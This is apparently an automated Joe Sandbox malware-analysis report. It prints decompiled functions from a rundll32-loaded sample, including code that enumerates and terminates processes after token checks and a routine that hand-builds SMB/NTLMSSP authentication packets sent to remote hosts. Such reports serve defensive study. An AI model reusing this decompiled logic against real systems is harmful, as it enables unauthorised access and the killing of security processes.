Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Crypt$Param$Hash$Local$AllocCreateDataDeriveDestroyFree
String ID:
API String ID: 797921460-0
Opcode ID: 0ebd914a7edf587c45704dd8c1be4c0b0421f8aa6cb6051090947a92affa3110
Instruction ID: 1224d82095259058224ae71c06ae22abe8d1e44abf6b3124de57c28421a1a28a
Opcode Fuzzy Hash: 0ebd914a7edf587c45704dd8c1be4c0b0421f8aa6cb6051090947a92affa3110
Instruction Fuzzy Hash: A2011E71900208FFEB21AF95DCC9EAEBBBDEB04751F104579F201A6150EA759E419B20

Uniqueness

Uniqueness Score: -1.00%

Function 007B84EE Relevance: 6.0, APIs: 4, Instructions: 35
processCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E007B84EE() {
				char _v524;
				int _v552;
				void* _v560;
				void* _t6;
				int _t8;
				int _t12;
				void* _t14;

				_t6 = CreateToolhelp32Snapshot(2, 0); // executed
				_t14 = _t6;
				if(_t14 != 0xffffffff) {
					_push( &_v560);
					_v560 = 0x22c;
					_t8 = Process32FirstW(_t14); // executed
					while(_t8 != 0) {
						if(E007B82EE( &_v524) == 0xf4713b0e) {
							E007B841D(_v552);
							L7:
							_t12 = FindCloseChangeNotification(_t14); // executed
							return _t12;
						}
						_t8 = Process32NextW(_t14,  &_v560);
					}
					goto L7;
				}
				return _t6;
			}

0x007b84fc
0x007b8502
0x007b8507
0x007b850f
0x007b8511
0x007b851b
0x007b8544
0x007b8534
0x007b8550
0x007b8555
0x007b8556
0x00000000
0x007b8556
0x007b853e
0x007b853e
0x00000000
0x007b8548
0x007b855e

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007B84FC
Process32FirstW.KERNEL32(00000000,?), ref: 007B851B
Process32NextW.KERNEL32(00000000,0000022C), ref: 007B853E
FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 007B8556

Part of subcall function 007B841D: GetCurrentProcessId.KERNEL32(?,007B8555,?,?), ref: 007B8430
Part of subcall function 007B841D: OpenProcess.KERNEL32(00000401,00000000,?,?,?,?,007B8555,?,?), ref: 007B844C
Part of subcall function 007B841D: OpenProcessToken.ADVAPI32(00000000,0000000E,?,00000000,?,?,?,007B8555,?,?), ref: 007B8464
Part of subcall function 007B841D: DuplicateToken.ADVAPI32(?,00000002,?,?,?,?,007B8555,?,?), ref: 007B847D
Part of subcall function 007B841D: AllocateAndInitializeSid.ADVAPI32(?,00000001,00000012,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007B84A3
Part of subcall function 007B841D: CheckTokenMembership.ADVAPI32(?,?,?), ref: 007B84BA
Part of subcall function 007B841D: TerminateProcess.KERNEL32(00000000,00000000), ref: 007B84CB
Part of subcall function 007B841D: FreeSid.ADVAPI32(?), ref: 007B84D4
Part of subcall function 007B841D: CloseHandle.KERNEL32(?), ref: 007B84DD
Part of subcall function 007B841D: CloseHandle.KERNEL32(?,?,?,?,007B8555,?,?), ref: 007B84E2
Part of subcall function 007B841D: CloseHandle.KERNEL32(00000000,?,?,?,007B8555,?,?), ref: 007B84E5

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: CloseProcess$HandleToken$OpenProcess32$AllocateChangeCheckCreateCurrentDuplicateFindFirstFreeInitializeMembershipNextNotificationSnapshotTerminateToolhelp32
String ID:
API String ID: 3524103904-0
Opcode ID: d90c1fd24b34a8ba35e4dbc71df3f613b98a12523f04cd3218e107f03b6838ff
Instruction ID: 49feb47fcae90e966398af3f46f733ea973da5520748e9acbf02f6769c806bdd
Opcode Fuzzy Hash: d90c1fd24b34a8ba35e4dbc71df3f613b98a12523f04cd3218e107f03b6838ff
Instruction Fuzzy Hash: D4F03631401528A6DB706BB8AC0DFDE7A7CAF09314F244291F915E20A1EB78DD54CE56

Uniqueness

Uniqueness Score: -1.00%

Function 007B554A Relevance: 6.0, APIs: 4, Instructions: 30
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E007B554A(void* __ecx, BYTE* _a4, int _a8) {
				signed int _v8;
				long** _t8;
				void* _t14;
				int _t15;

				_t15 = 0;
				_v8 = _v8 & 0;
				_t8 =  &_v8;
				__imp__CryptAcquireContextW(_t8, 0, 0, 0x18, 0xf0000000, _t14, __ecx); // executed
				if(_t8 != 0 || GetLastError() == 0x80090016) {
					_t15 = CryptGenRandom(_v8, _a8, _a4);
					CryptReleaseContext(_v8, 0);
				}
				return _t15;
			}

0x007b5556
0x007b5558
0x007b555d
0x007b5561
0x007b5569
0x007b558c
0x007b558e
0x007b558e
0x007b5598

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,007B790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 007B5561
GetLastError.KERNEL32(?,?,?,007B790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,007B79E8), ref: 007B556B
CryptGenRandom.ADVAPI32(?,?,?,?,?,?,007B790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,007B79E8), ref: 007B5581
CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,007B790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,007B79E8), ref: 007B558E

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Crypt$Context$AcquireErrorLastRandomRelease
String ID:
API String ID: 2963463078-0
Opcode ID: 7eabb031d95510e94f9b4fc8c515f8a7d7d4b26b25c2d2ecd2f479f8d5eee8b0
Instruction ID: d7944247acf9f3acf219b560d26f4553e34407adb9ea48832b298562efd8dda3
Opcode Fuzzy Hash: 7eabb031d95510e94f9b4fc8c515f8a7d7d4b26b25c2d2ecd2f479f8d5eee8b0
Instruction Fuzzy Hash: E1F01C36600248FBDF206BA6DD0DFCE7ABAEBC4711F208114F605D2160E6799E11EB24

Uniqueness

Uniqueness Score: -1.00%

Function 007B5507 Relevance: 4.5, APIs: 3, Instructions: 29
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E007B5507(intOrPtr _a4) {
				void* _t3;
				void* _t7;
				intOrPtr* _t8;

				_t8 = __imp__CryptAcquireContextW;
				_t3 =  *_t8(_a4, 0, 0, 0x18, 0xf0000000); // executed
				_t7 = _t3;
				if(_t7 == 0 && GetLastError() == 0x80090016) {
					_t7 =  *_t8(_a4, _t7, _t7, 0x18, 8);
				}
				return _t7;
			}

0x007b550c
0x007b5520
0x007b5522
0x007b5526
0x007b5540
0x007b5540
0x007b5547

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,007B62C3,?), ref: 007B5520
GetLastError.KERNEL32(?,007B62C3,?), ref: 007B5528
CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,007B62C3,?), ref: 007B553E

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: AcquireContextCrypt$ErrorLast
String ID:
API String ID: 2779411412-0
Opcode ID: 7f3f5fd10eda1b40eed3e9154dda0902728de803202da2fd54da64da8cb3e994
Instruction ID: e4c4babe9ba82e1e683a9fbdb60e06b1d715817553bfb4b00421b21a078f4f05
Opcode Fuzzy Hash: 7f3f5fd10eda1b40eed3e9154dda0902728de803202da2fd54da64da8cb3e994
Instruction Fuzzy Hash: 9DE0867138471D7FFB301A989C81F963A9EEB28755F208026F700E61D1DAE5AD1457E8

Uniqueness

Uniqueness Score: -1.00%

Function 007B7D4E Relevance: 3.0, APIs: 2, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E007B7D4E(void* __ecx) {
				signed int _v8;
				void** _t9;
				signed char _t12;
				void* _t14;
				void* _t15;
				void* _t16;

				_t9 =  &_v8;
				_t16 = 0;
				_v8 = _v8 & 0;
				__imp__NetServerGetInfo(0, 0x65, _t9, _t15, __ecx); // executed
				_t14 = _v8;
				if(_t9 == 0) {
					_t12 =  *(_t14 + 0x10);
					if((_t12 & 0x00008000) != 0 || (_t12 & 0x00000018) != 0) {
						_t16 = 1;
					}
				}
				if(_t14 != 0) {
					NetApiBufferFree(_t14);
				}
				return _t16;
			}

0x007b7d53
0x007b7d57
0x007b7d59
0x007b7d5f
0x007b7d65
0x007b7d6a
0x007b7d6c
0x007b7d74
0x007b7d7c
0x007b7d7c
0x007b7d74
0x007b7d7f
0x007b7d82
0x007b7d82
0x007b7d8c

APIs

NetServerGetInfo.NETAPI32(00000000,00000065,?,7404C4E0,?,?,007B8C7C), ref: 007B7D5F
NetApiBufferFree.NETAPI32(?,?,?,007B8C7C), ref: 007B7D82

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: BufferFreeInfoServer
String ID:
API String ID: 3855943681-0
Opcode ID: 528765ff973a2da3041b4bf51f49fa2eed2d682d1b5e0ac258fc1b626d445305
Instruction ID: 974f95bdb117aad91fe21ecb1902622c64c465f29d86bce2182cfff1baed0d84
Opcode Fuzzy Hash: 528765ff973a2da3041b4bf51f49fa2eed2d682d1b5e0ac258fc1b626d445305
Instruction Fuzzy Hash: F8E09271706624A7DF3CCB55CD08FFA766CEF80BD1B004218AC41E6110E328DE01C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 007B1747 Relevance: 72.2, APIs: 38, Strings: 3, Instructions: 424
memorynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E007B1747(intOrPtr _a4, void** _a8, long _a12, void* _a16, signed int _a20, void* _a24) {
				char _v5;
				signed int _v12;
				int _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				void _v44;
				void* _v48;
				intOrPtr* _t165;
				signed short _t168;
				int _t170;
				signed short* _t175;
				intOrPtr* _t177;
				void* _t187;
				short _t189;
				short _t193;
				signed char* _t194;
				void* _t198;
				void* _t201;
				signed int _t205;
				void* _t209;
				void* _t212;
				long _t215;
				int _t216;
				void* _t218;
				void* _t222;
				void* _t235;
				short _t237;
				short _t240;
				char _t244;
				char _t245;
				char _t246;
				short _t250;
				void* _t253;
				void* _t257;
				short _t258;
				intOrPtr _t261;
				void* _t264;
				void* _t266;
				signed int _t267;
				void* _t268;
				signed int _t269;
				void* _t271;
				intOrPtr* _t282;
				signed int _t285;
				intOrPtr _t288;
				signed int _t289;
				short _t292;
				intOrPtr _t293;
				WCHAR* _t294;
				intOrPtr _t295;
				signed char _t297;
				signed int _t300;
				intOrPtr _t302;
				void* _t304;
				void* _t305;
				signed int* _t308;
				void* _t309;
				void* _t315;
				void* _t319;
				void* _t321;
				void* _t322;
				signed short _t325;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t331;

				_t165 = _a16;
				_v5 = 0;
				_t266 = _t165 + 2;
				do {
					_t293 =  *_t165;
					_t165 = _t165 + 2;
				} while (_t293 != 0);
				_t168 = _t165 - _t266 >> 0x00000001 & 0x0000ffff;
				_v12 = _t168;
				_t170 = (_t168 & 0x0000ffff) + (_t168 & 0x0000ffff);
				_v16 = _t170;
				_t294 = HeapAlloc(GetProcessHeap(), 8, _t170 + 2);
				_v36 = _t294;
				if(_t294 == 0) {
					L53:
					return _v5;
				}
				_t175 = _a16;
				_t304 = _t294 - _t175;
				do {
					_t267 =  *_t175 & 0x0000ffff;
					 *(_t304 + _t175) = _t267;
					_t175 =  &(_t175[1]);
				} while (_t267 != 0);
				CharUpperW(_t294);
				_t177 = _a20;
				_t268 = _t177 + 2;
				do {
					_t295 =  *_t177;
					_t177 = _t177 + 2;
				} while (_t295 != 0);
				_v32 = _t177 - _t268 >> 0x00000001 & 0x0000ffff;
				_t305 = HeapAlloc(GetProcessHeap(), 8, 0x86);
				_v28 = _t305;
				if(_t305 == 0) {
					L52:
					HeapFree(GetProcessHeap(), 8, _v36);
					goto L53;
				}
				_t321 =  *_a8;
				_t269 = 9;
				 *((short*)(_t321 + 0x20)) = 0;
				_t187 = memcpy(_t305, _t321, _t269 << 2);
				_t329 = _t328 + 0xc;
				__imp__#9(0x82);
				_t322 = _v28;
				 *(_t322 + 2) = _t187;
				 *((short*)(_t322 + 0x29)) = 0x1104;
				_t189 = 2;
				 *((short*)(_t322 + 0x2b)) = _t189;
				_t271 = 0x42;
				 *((short*)(_t322 + 0x2d)) = 1;
				 *((short*)(_t322 + 0x33)) = 0;
				_t193 = 0x47;
				 *((short*)(_t322 + 0x3d)) = _t193;
				 *((char*)(_t322 + 8)) = 0x73;
				 *((short*)(_t322 + 0x24)) = 0xff0c;
				 *((intOrPtr*)(_t322 + 0x39)) = 0x8000c044;
				_t308 = 0x7c35f0;
				_t194 = _t322 + 0x3f;
				do {
					_t297 =  !( *_t308);
					_t308 =  &(_t308[0]);
					 *_t194 = _t297;
					_t194 =  &(_t194[1]);
					_t271 = _t271 - 1;
				} while (_t271 != 0);
				__imp__#19(_a4, _t322, 0x86, _t271); // executed
				if(_t194 <= 0) {
					L51:
					HeapFree(GetProcessHeap(), 8, _t322);
					goto L52;
				}
				_t309 = _a24;
				__imp__#16(_a4, _t309, 0xffff, 0); // executed
				if(_t194 <= 0x84) {
					goto L51;
				}
				 *((short*)( *_a8 + 0x20)) =  *((intOrPtr*)(_t309 + 0x20));
				if( *((intOrPtr*)(_t309 + 9)) != 0xc0000016) {
					goto L51;
				}
				_t198 = 0x2d;
				while(1) {
					_t300 =  *(_t198 + _t309 + 4) ^ 0x00505353;
					if(( *(_t198 + _t309) ^ 0x4d4c544e) == 0 && _t300 == 0 &&  *((intOrPtr*)(_t198 + _t309 + 8)) == 2) {
						break;
					}
					_t198 = _t198 + 1;
					if(_t198 < 0x70) {
						continue;
					}
					goto L51;
				}
				_v44 =  *((intOrPtr*)(_t198 + _t309 + 0x18));
				_v40 =  *((intOrPtr*)(_t198 + _t309 + 0x1c));
				 *_a12 =  *((intOrPtr*)(_t198 + _t309 + 0x30));
				_t201 = HeapAlloc(GetProcessHeap(), 8, 0x18);
				_v24 = _t201;
				if(_t201 == 0) {
					goto L51;
				}
				_t205 = E007B15A7(_a20, (_v32 & 0x0000ffff) + (_v32 & 0x0000ffff), 0,  &_v24, 0x8002); // executed
				if(_t205 != 0) {
					L50:
					HeapFree(GetProcessHeap(), 8, _v24);
					goto L51;
				}
				_a20 = _a20 & _t205;
				_t209 = E007B15A7(_v36, _v16, _v24,  &_a20, 0x8003); // executed
				if(_t209 != 0) {
					goto L50;
				}
				_v48 = _a20;
				_t212 = HeapAlloc(GetProcessHeap(), 8, 0x10);
				_v32 = _t212;
				if(_t212 == 0) {
					L49:
					HeapFree(GetProcessHeap(), 8, _a20);
					goto L50;
				}
				 *_t212 = _v44;
				 *((intOrPtr*)(_t212 + 4)) = _v40;
				_t215 = _t212 + 8;
				_v40 = _t215;
				_a12 = _t215;
				_v20 = 8;
				do {
					_t216 = rand();
					_a12 = _a12 + 1;
					_t70 =  &_v20;
					 *_t70 = _v20 - 1;
					 *_a12 = _t216;
				} while ( *_t70 != 0);
				_t218 = E007B15A7(_v32, 0x10, _a20,  &_a20, 0x8003); // executed
				if(_t218 == 0) {
					_t222 = HeapAlloc(GetProcessHeap(), 8, 0x18);
					_v20 = _t222;
					if(_t222 != 0) {
						_t282 = _v40;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *((intOrPtr*)(_t222 + 0x10)) =  *_t282;
						 *((intOrPtr*)(_t222 + 0x14)) =  *((intOrPtr*)(_t282 + 4));
						if(0 == _v12) {
							 *_t222 = 0x55004e;
							 *((intOrPtr*)(_t222 + 4)) = 0x4c004c;
						}
						_a12 = (_v12 & 0x0000ffff) + (_v12 & 0x0000ffff) + 0xa4;
						if(0 == _v12) {
							_a12 = _a12 - 0x10;
						}
						_t264 = HeapAlloc(GetProcessHeap(), 8, _a12);
						if(_t264 != 0) {
							_t285 = 9;
							_t235 = memcpy(_t264,  *_a8, _t285 << 2);
							_t330 = _t329 + 0xc;
							__imp__#9(_a12 + 0xfffffffc);
							_t325 = _v12;
							 *(_t264 + 2) = _t235;
							 *((short*)(_t264 + 0x29)) = 0x1104;
							_t237 = 2;
							 *((short*)(_t264 + 0x2b)) = _t237;
							 *((short*)(_t264 + 0x2d)) = 1;
							_t240 = _t325 + _t325 + 0x60;
							 *((char*)(_t264 + 8)) = 0x73;
							 *((short*)(_t264 + 0x24)) = 0xff0c;
							 *((short*)(_t264 + 0x33)) = _t240;
							if(0 == _t325) {
								 *((short*)(_t264 + 0x33)) = _t240 + 0xfffffff0;
							}
							 *((short*)(_t264 + 0x3d)) =  *((intOrPtr*)(_t264 + 0x33)) + 5;
							_t244 =  *((intOrPtr*)(_t264 + 0x33)) - 2;
							 *((char*)(_t264 + 0x40)) = _t244;
							_t245 = _t244 - 2;
							 *((char*)(_t264 + 0x42)) = _t245;
							_t246 = _t245 - 2;
							 *((char*)(_t264 + 0x44)) = _t246;
							 *((char*)(_t264 + 0x46)) = _t246 - 2;
							 *((intOrPtr*)(_t264 + 0x39)) = 0x8000c044;
							 *((char*)(_t264 + 0x3f)) = 0xa1;
							 *((char*)(_t264 + 0x41)) = 0x30;
							 *((char*)(_t264 + 0x43)) = 0xa2;
							 *((char*)(_t264 + 0x45)) = 4;
							 *((intOrPtr*)(_t264 + 0x47)) = 0x4d4c544e;
							 *((intOrPtr*)(_t264 + 0x4b)) = 0x505353;
							 *((intOrPtr*)(_t264 + 0x4f)) = 3;
							if(0 == _t325) {
								_t288 = 0x48;
								_push(0x40);
								 *((intOrPtr*)(_t264 + 0x67)) = 0;
								 *((intOrPtr*)(_t264 + 0x6f)) = 0;
								 *((intOrPtr*)(_t264 + 0x77)) = 0;
								_t250 = 8;
								 *((intOrPtr*)(_t264 + 0x57)) = _t288;
								 *((intOrPtr*)(_t264 + 0x5f)) = _t288;
								 *((intOrPtr*)(_t264 + 0x7f)) = _t288;
								 *((short*)(_t264 + 0x73)) = _t250;
								 *((short*)(_t264 + 0x75)) = _t250;
							} else {
								_t258 = 0x18;
								 *((short*)(_t264 + 0x53)) = _t258;
								 *((short*)(_t264 + 0x55)) = _t258;
								_t302 = 0x68;
								 *((intOrPtr*)(_t264 + 0x57)) = (_t325 & 0x0000ffff) + (_t325 & 0x0000ffff) + 0x40;
								_t261 = 0x40;
								_t292 = _t325 + _t325;
								 *((intOrPtr*)(_t264 + 0x5f)) = _t302;
								 *((intOrPtr*)(_t264 + 0x67)) = _t261;
								 *((short*)(_t264 + 0x6b)) = _t292;
								 *((short*)(_t264 + 0x6d)) = _t292;
								 *((intOrPtr*)(_t264 + 0x6f)) = _t261;
								 *((intOrPtr*)(_t264 + 0x77)) = 0x50;
								 *((intOrPtr*)(_t264 + 0x7f)) = _t302;
							}
							_t142 = _t264 + 0x87; // 0x87
							_t315 = _t142;
							 *((intOrPtr*)(_t264 + 0x83)) = 0xa0880205;
							memcpy(_t315, _a16, _v16);
							_t331 = _t330 + 0xc;
							if(0 != _t325) {
								_t289 = 6;
								_t253 = memcpy(_t315 + _v16, _v20, _t289 << 2);
								_t331 = _t331 + 0xc;
							} else {
								_t257 = _v20;
								 *_t315 =  *_t257;
								_t253 =  *(_t257 + 4);
								 *(_t315 + 4) = _t253;
							}
							__imp__#19(_a4, _t264, _a12, 0); // executed
							if(_t253 > 0) {
								_t319 = _a24;
								__imp__#16(_a4, _t319, 0xffff, 0); // executed
								if(_t253 > 0) {
									if( *((intOrPtr*)(_t319 + 9)) == 0) {
										_v5 = 1;
									}
									memset(_t319, 0, 0xffff);
								}
							}
							HeapFree(GetProcessHeap(), 8, _t264);
						}
						HeapFree(GetProcessHeap(), 8, _v20);
						_t322 = _v28;
					}
					HeapFree(GetProcessHeap(), 8, _v48);
				}
				HeapFree(GetProcessHeap(), 8, _v32);
				goto L49;
			}

0x007b174d
0x007b1753
0x007b1757
0x007b175a
0x007b175a
0x007b175d
0x007b1760
0x007b176f
0x007b1772
0x007b1778
0x007b177a
0x007b178e
0x007b1790
0x007b1795
0x007b1c30
0x007b1c37
0x007b1c37
0x007b179b
0x007b17a0
0x007b17a2
0x007b17a2
0x007b17a5
0x007b17a9
0x007b17ac
0x007b17b2
0x007b17b8
0x007b17bb
0x007b17be
0x007b17be
0x007b17c1
0x007b17c4
0x007b17d7
0x007b17df
0x007b17e1
0x007b17e6
0x007b1c22
0x007b1c2a
0x00000000
0x007b1c2a
0x007b17ef
0x007b17f3
0x007b17f6
0x007b17ff
0x007b17ff
0x007b1801
0x007b1807
0x007b180a
0x007b1815
0x007b1819
0x007b181a
0x007b1823
0x007b1824
0x007b182a
0x007b1830
0x007b1831
0x007b1835
0x007b1839
0x007b183f
0x007b1846
0x007b184b
0x007b184e
0x007b1850
0x007b1852
0x007b1853
0x007b1855
0x007b1856
0x007b1856
0x007b1863
0x007b186b
0x007b1c16
0x007b1c1c
0x00000000
0x007b1c1c
0x007b1871
0x007b187f
0x007b188a
0x00000000
0x00000000
0x007b189c
0x007b18a5
0x00000000
0x00000000
0x007b18ad
0x007b18ae
0x007b18b5
0x007b18c1
0x00000000
0x00000000
0x007b18ce
0x007b18d2
0x00000000
0x00000000
0x00000000
0x007b18d4
0x007b18dd
0x007b18e8
0x007b18f2
0x007b18fd
0x007b18ff
0x007b1904
0x00000000
0x00000000
0x007b191f
0x007b1926
0x007b1c08
0x007b1c10
0x00000000
0x007b1c10
0x007b192c
0x007b1941
0x007b1948
0x00000000
0x00000000
0x007b1955
0x007b195b
0x007b195d
0x007b1962
0x007b1bfa
0x007b1c02
0x00000000
0x007b1c02
0x007b196b
0x007b1970
0x007b1973
0x007b1976
0x007b1979
0x007b197c
0x007b1983
0x007b1983
0x007b198c
0x007b198f
0x007b198f
0x007b1992
0x007b1992
0x007b19a7
0x007b19ae
0x007b19bb
0x007b19bd
0x007b19c2
0x007b19cb
0x007b19d0
0x007b19d1
0x007b19d2
0x007b19d3
0x007b19d6
0x007b19dc
0x007b19e5
0x007b19e7
0x007b19ed
0x007b19ed
0x007b19ff
0x007b1a08
0x007b1a0a
0x007b1a0a
0x007b1a1c
0x007b1a20
0x007b1a30
0x007b1a37
0x007b1a37
0x007b1a39
0x007b1a3f
0x007b1a42
0x007b1a4b
0x007b1a51
0x007b1a52
0x007b1a59
0x007b1a5f
0x007b1a63
0x007b1a67
0x007b1a6d
0x007b1a74
0x007b1a79
0x007b1a79
0x007b1a85
0x007b1a8c
0x007b1a8e
0x007b1a91
0x007b1a93
0x007b1a96
0x007b1a98
0x007b1a9d
0x007b1aa2
0x007b1aa9
0x007b1aad
0x007b1ab1
0x007b1ab5
0x007b1ab9
0x007b1ac0
0x007b1ac7
0x007b1ad1
0x007b1b10
0x007b1b11
0x007b1b16
0x007b1b19
0x007b1b1c
0x007b1b1f
0x007b1b20
0x007b1b23
0x007b1b26
0x007b1b29
0x007b1b2d
0x007b1ad3
0x007b1ad5
0x007b1ad6
0x007b1ada
0x007b1ae3
0x007b1aea
0x007b1aed
0x007b1aee
0x007b1af1
0x007b1af4
0x007b1af7
0x007b1afb
0x007b1aff
0x007b1b02
0x007b1b09
0x007b1b09
0x007b1b34
0x007b1b34
0x007b1b3d
0x007b1b48
0x007b1b4f
0x007b1b55
0x007b1b6e
0x007b1b6f
0x007b1b6f
0x007b1b57
0x007b1b57
0x007b1b5c
0x007b1b5e
0x007b1b61
0x007b1b61
0x007b1b7a
0x007b1b82
0x007b1b84
0x007b1b93
0x007b1b9b
0x007b1ba1
0x007b1ba3
0x007b1ba3
0x007b1bab
0x007b1bb0
0x007b1b9b
0x007b1bbd
0x007b1bbd
0x007b1bcf
0x007b1bdb
0x007b1bdb
0x007b1be6
0x007b1be6
0x007b1bf4
0x00000000

APIs

GetProcessHeap.KERNEL32(00000008,?,00000000,?,00000000,007B1C7A,00000000,?,00000000,00000000,?,?,00000003,00000000,?,00000000), ref: 007B1783
HeapAlloc.KERNEL32(00000000), ref: 007B178C
CharUpperW.USER32(00000000), ref: 007B17B2
GetProcessHeap.KERNEL32(00000008,00000086), ref: 007B17DA
HeapAlloc.KERNEL32(00000000), ref: 007B17DD
htons.WS2_32(00000082), ref: 007B1801
send.WS2_32(00000086,?,00000086,00000041), ref: 007B1863
recv.WS2_32(0000FFFF,?,0000FFFF,00000000), ref: 007B187F
GetProcessHeap.KERNEL32(00000008,00000018), ref: 007B18F4
HeapAlloc.KERNEL32(00000000), ref: 007B18FD
GetProcessHeap.KERNEL32(00000008,00000010,?,00000000,?,00008003,00008003,?,?,00000000,?,00008002), ref: 007B1958
HeapAlloc.KERNEL32(00000000), ref: 007B195B
rand.MSVCRT ref: 007B1983
GetProcessHeap.KERNEL32(00000008,00000018,?,00000010,?,?,00008003), ref: 007B19B8
HeapAlloc.KERNEL32(00000000), ref: 007B19BB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B1A13
HeapAlloc.KERNEL32(00000000), ref: 007B1A16
htons.WS2_32(-000000FC), ref: 007B1A39
memcpy.MSVCRT ref: 007B1B48
send.WS2_32(?,00000000,00000000,00000000), ref: 007B1B7A
recv.WS2_32(?,?,0000FFFF,00000000), ref: 007B1B93
memset.MSVCRT ref: 007B1BAB
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B1BB6
HeapFree.KERNEL32(00000000), ref: 007B1BBD
GetProcessHeap.KERNEL32(00000008,00000000), ref: 007B1BC8
HeapFree.KERNEL32(00000000), ref: 007B1BCF
GetProcessHeap.KERNEL32(00000008,?), ref: 007B1BE3
HeapFree.KERNEL32(00000000), ref: 007B1BE6
GetProcessHeap.KERNEL32(00000008,?,?,00000010,?,?,00008003), ref: 007B1BF1
HeapFree.KERNEL32(00000000), ref: 007B1BF4
GetProcessHeap.KERNEL32(00000008,?), ref: 007B1BFF
HeapFree.KERNEL32(00000000), ref: 007B1C02
GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,?,00008002), ref: 007B1C0D
HeapFree.KERNEL32(00000000), ref: 007B1C10
GetProcessHeap.KERNEL32(00000008,?), ref: 007B1C19
HeapFree.KERNEL32(00000000), ref: 007B1C1C
GetProcessHeap.KERNEL32(00000008,?), ref: 007B1C27
HeapFree.KERNEL32(00000000), ref: 007B1C2A

Strings

NTLM, xrefs: 007B1AB9
SSP, xrefs: 007B1AC0
Oet Uet0Xet, xrefs: 007B1765, 007B1BB6, 007B1BC8, 007B1BD5

Memory Dump Source

Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd

Similarity

API ID: Heap$Process$Free$Alloc$htonsrecvsend$CharUppermemcpymemsetrand
String ID: Oet Uet0Xet$NTLM$SSP
API String ID: 2370844593-2728736143
